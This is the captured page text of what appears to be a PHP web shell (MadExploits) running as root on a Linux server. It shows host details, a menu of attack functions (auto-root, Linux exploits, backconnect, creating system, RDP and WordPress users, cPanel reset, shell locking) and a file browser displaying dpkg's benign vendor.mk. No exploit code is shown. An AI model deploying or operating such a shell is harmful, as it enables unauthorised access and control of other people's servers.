Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.43.133
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
sh
[ DIR ]
drwxr-xr-x
abitable
352
B
-rw-r--r--
architecture.mk
973
B
-rw-r--r--
buildapi.mk
710
B
-rw-r--r--
buildflags.mk
2.77
KB
-rw-r--r--
buildopts.mk
886
B
-rw-r--r--
buildtools.mk
2.95
KB
-rw-r--r--
cputable
2.01
KB
-rw-r--r--
default.mk
739
B
-rw-r--r--
no-pie-compile.specs
77
B
-rw-r--r--
no-pie-link.specs
65
B
-rw-r--r--
ostable
1.84
KB
-rw-r--r--
pie-compile.specs
97
B
-rw-r--r--
pie-link.specs
76
B
-rw-r--r--
pkg-info.mk
3.28
KB
-rw-r--r--
tupletable
2.67
KB
-rw-r--r--
vendor.mk
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vendor.mk
# This Makefile fragment (since dpkg 1.16.1) defines the following # vendor-related variables: # # DEB_VENDOR: Output of «dpkg-vendor --query Vendor». # DEB_PARENT_VENDOR: Output of «dpkg-vendor --query Parent» (can be empty). # # This Makefile fragment also defines a set of "dpkg_vendor_derives_from" # macros that can be used to verify if the current vendor derives from # another vendor. The unversioned variant defaults to the v0 version if # undefined or to the v1 version when on build API 1, otherwise it can be # defined explicitly to one of the versions or the versioned macros can be # used directly. The following are example usages: # # - dpkg_vendor_derives_from (since dpkg 1.16.1) # # ifeq ($(shell $(call dpkg_vendor_derives_from,ubuntu)),yes) # ... # endif # # - dpkg_vendor_derives_from_v0 (since dpkg 1.19.3) # # ifeq ($(shell $(call dpkg_vendor_derives_from_v0,ubuntu)),yes) # ... # endif # # - dpkg_vendor_derives_from_v1 (since dpkg 1.19.3) # # dpkg_vendor_derives_from = $(dpkg_vendor_derives_from_v1) # ifeq ($(call dpkg_vendor_derives_from,ubuntu),yes) # ... # endif # ifeq ($(call dpkg_vendor_derives_from_v1,ubuntu),yes) # ... # endif # # Note: # - Only documented variables are considered public interfaces. # - Expects to be included from the source tree root directory. ifndef dpkg_vendor_mk_included dpkg_vendor_mk_included = yes ifndef dpkg_datadir dpkg_datadir := $(dir $(lastword $(MAKEFILE_LIST))) endif include $(dpkg_datadir)/buildapi.mk dpkg_late_eval ?= $(if $(filter undefined,$(flavor DPKG_CACHE_$(1))),$(eval DPKG_CACHE_$(1) := $(shell $(2)))$(value DPKG_CACHE_$(1)),$(value DPKG_CACHE_$(1))) DEB_VENDOR = $(call dpkg_late_eval,DEB_VENDOR,dpkg-vendor --query Vendor) DEB_PARENT_VENDOR = $(call dpkg_late_eval,DEB_PARENT_VENDOR,dpkg-vendor --query Parent) dpkg_vendor_derives_from_v0 = dpkg-vendor --derives-from $(1) && echo yes || echo no dpkg_vendor_derives_from_v1 = $(shell $(dpkg_vendor_derives_from_v0)) ifeq ($(call dpkg_build_api_ge,1),yes) dpkg_vendor_derives_from ?= $(dpkg_vendor_derives_from_v1) else dpkg_vendor_derives_from ?= $(dpkg_vendor_derives_from_v0) endif endif # dpkg_vendor_mk_included
Close